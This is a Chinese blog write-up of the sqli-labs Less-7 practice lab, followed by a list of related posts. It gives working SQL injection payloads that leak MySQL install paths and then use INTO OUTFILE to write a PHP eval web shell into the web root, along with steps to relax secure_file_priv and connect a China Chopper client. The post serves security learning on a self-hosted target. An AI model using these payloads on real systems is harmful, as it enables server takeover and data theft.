sqli-labs/less7

最新推荐文章于 2023-11-25 12:08:09 发布
最新推荐文章于 2023-11-25 12:08:09 发布
阅读量240 收藏
点赞数
分类专栏: 网络安全 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/devilare/article/details/110562396
版权

sqli-labs7

看题目
在这里插入图片描述输入?id=1!在这里插入图片描述尝试常规操作,id=1’ id=1"等,最后发现只有id=1’时会出现报错,那么开始猜,加括号(别问我为啥,因为习惯吧(狗头保命,大佬友善指点))。最后试出当id=1’))时页面显示正常在这里插入图片描述然后又是接着的常规操作,查看字段union select 1,2,3时为正常显示,但是接下来就不能有常规手段暴库名了在这里插入图片描述因为没有数据回显,所以常规注入进行不了,看看其他办法…Use outfile…试试,这里解释一下:
outfile函数可以导出多行,而dumpfile只能导出一行数据
outfile函数在将数据写到文件里时有特殊的格式转换
用法呢 into outfile 构造payload进行木马注入:localhost/sqli-labs-master/Less-7/?id=-1’)) union select 1,2,’<?php @eval($_post [“password”]);?>’ into outfile “???”
这里的"???"为你的mysql地址可以用前面的题来显示地址:http://localhost/sqli-labs-master/Less-2/?id=-1%20union%20select%201,@@basedir,@@datadir%20–+
@@basedir,@@datadir用来显示安装路径得到路径后在这里插入图片描述进行注入localhost/sqli-labs-master/Less-7/?id=-1’)) union select 1,2,’<?php @eval($_post [“password”]);?>’ into outfile “E:\phpstudy\phpstudy_pro\WWW\sqli-labs-master\Less_7\ttt.php”
虽然页面还是报错但是实际上已经有了ttt.php这个文件在这里插入图片描述
在这里插入图片描述
这里说一下,如果没办法导出文件一般有两种原因:1、没有ROOT权限,但一般sqli-labs是自己搭的靶机所以不存在这种情况。
2、没有导出文件的权限,即导入导出的权限,原因是由参数secure_file_priv决定的

secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。

当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出

当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下

当secure_file_priv的值没有具体值时(null值),表示不对mysqld 的导入|导出做限制

如果是第二种情况我们需要找到mysql里的my.ini修改为secure_file_priv=即可。
然后我们看导出的文件在这里插入图片描述最后菜刀连接,over。

Aurora李
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs第七关sql注入流程
qq_33598708的博客
04-09 3578
正常访问 http://127.0.0.1/sqli-labs-master/Less-7/?id=1 正常访问以后提示Use outfile..... 什么是outfile:参考地址 MySQL中你可以使用SELECT...INTO OUTFILE语句来简单的导出数据到文本文件上。 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' and '1'='1 通过注入字符没有报错可以判断是字符类型的,这关数据库报错不会提示
sqli-labs靶场Less-7
songling515010475的专栏
08-21 328
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。 1、访问首页,/Less-7/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下: 结果1: 结果2: 分析:这里我尝试不管是怎么样,通过...
sqli-labs-master 第七关详解
weixin_39464539的博客
05-06 1574
靶机环境:win10 phpstudy 2018 路径C:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7 首先,输入id参数,尝试寻找注入点 构造 ?id=1 显示正常 ?id=1' 显示异常 ?id=1')--+显示异常 ?id=1')) --+显示正常 由此判断源码闭合为 "((id')) 2.判断字段数量 ?id=1')) order by...
[网络安全]sqli-labs Less-7 解题详析
等风来
07-23 2476
以上为[网络安全]sqli-labs Less-7 解题详析,后续将分享[网络安全]sqli-labs Less-8 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
sqli-labs-master第七关Less-7超详细360°无死角教程
最新发布
hih30250的博客
11-25 1045
不带参数请求页面:可以看到,页面让我们输入id,我们输入一个?id=1作为参数:可以看到给出了正常的数据。我们再输入一个不存在的id参数?id=999可以看到页面给出SQL语句语法错误。
sqli-labs:less-7
羽的博客
07-14 304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-labs
weixin_53955759的博客
04-13 2939
Less-1: 1.查字段数 2.看回显位置 3.爆数据库 4.爆表 5.爆字段 6.获取信息 Less-2: 相同步骤 1.查字段数 2.看回显位置 3.爆数据库 4.报表名 5.爆字段 6.获取信息 Less-3: 看了源码发现要闭合括号 1.爆字段数 ...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqlilabs—less7
一个普普通通的博客
03-24 2552
sqlilabs—less7
SQLi-LABS Less-7&&和phpstudy下数据库的修改权限
m0_64898960的博客
04-15 1670
SQLi-LABS Less-7&&和phpstudy下数据库的修改权限
Linux下sql_labs第七关,sqli-labs(7-8关)
weixin_29669143的博客
05-16 569
知识点:1.phpstudy文件读写权限的问题:使用show variables like '%secure%';在命令行中查看secure-file-priy当前的值,如果显示NULL,则需要打开phpstudy\MySQL\my.ini文件,在其中加上一句:secure_file_priv="/" 2.一句话木马(配合中国菜刀使用):php版本:,pass为密码3.into outfile函数...
Sqli-labs之Less-7
m0_46315342的博客
06-04 3190
                                          &nbs...
sqli-labs ————less -7
Fly_鹏程万里
05-11 4178
Less-7打开关卡网页之后,根据提示传入参数id,数据类型为numeric,之后可以看到如上的提示信息,在提示信息中给出了让我们使用outfile的提示,那么我们还是先来看看源码吧:关键sql代码:$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=mysql_query($sql);可以看出这里对传入的参数id进行了...
sqli-labs-Less-7、8、9、10
giun的博客
02-10 1030
Less-7 注意在要对文件进行导入导出首先得要有足够的权限, 但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null) secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 1、当secure_file_priv的值为null ,表示限制mysqld ...
[MRCTF2020]你传你呢 1
devilare的博客
05-22 5551
[MRCTF2020]你传你????呢 文件上传漏洞,打开题目 随便上传个文件嘿呦,被过滤了,试试大小写等等,好像都绕不过。嗯。。。瓶颈,看看大佬wp,.htaccess文件, htaccess小知识 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOver
sqli-labs/Less-7
07-28
Less-7是其中的一个挑战,它主要涉及基于错误消息的盲注漏洞。 在Less-7中,你将面对一个包含漏洞的应用程序,该应用程序在处理用户输入时存在SQL注入漏洞。具体来说,这个挑战是通过一个GET请求向应用程序发送参数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值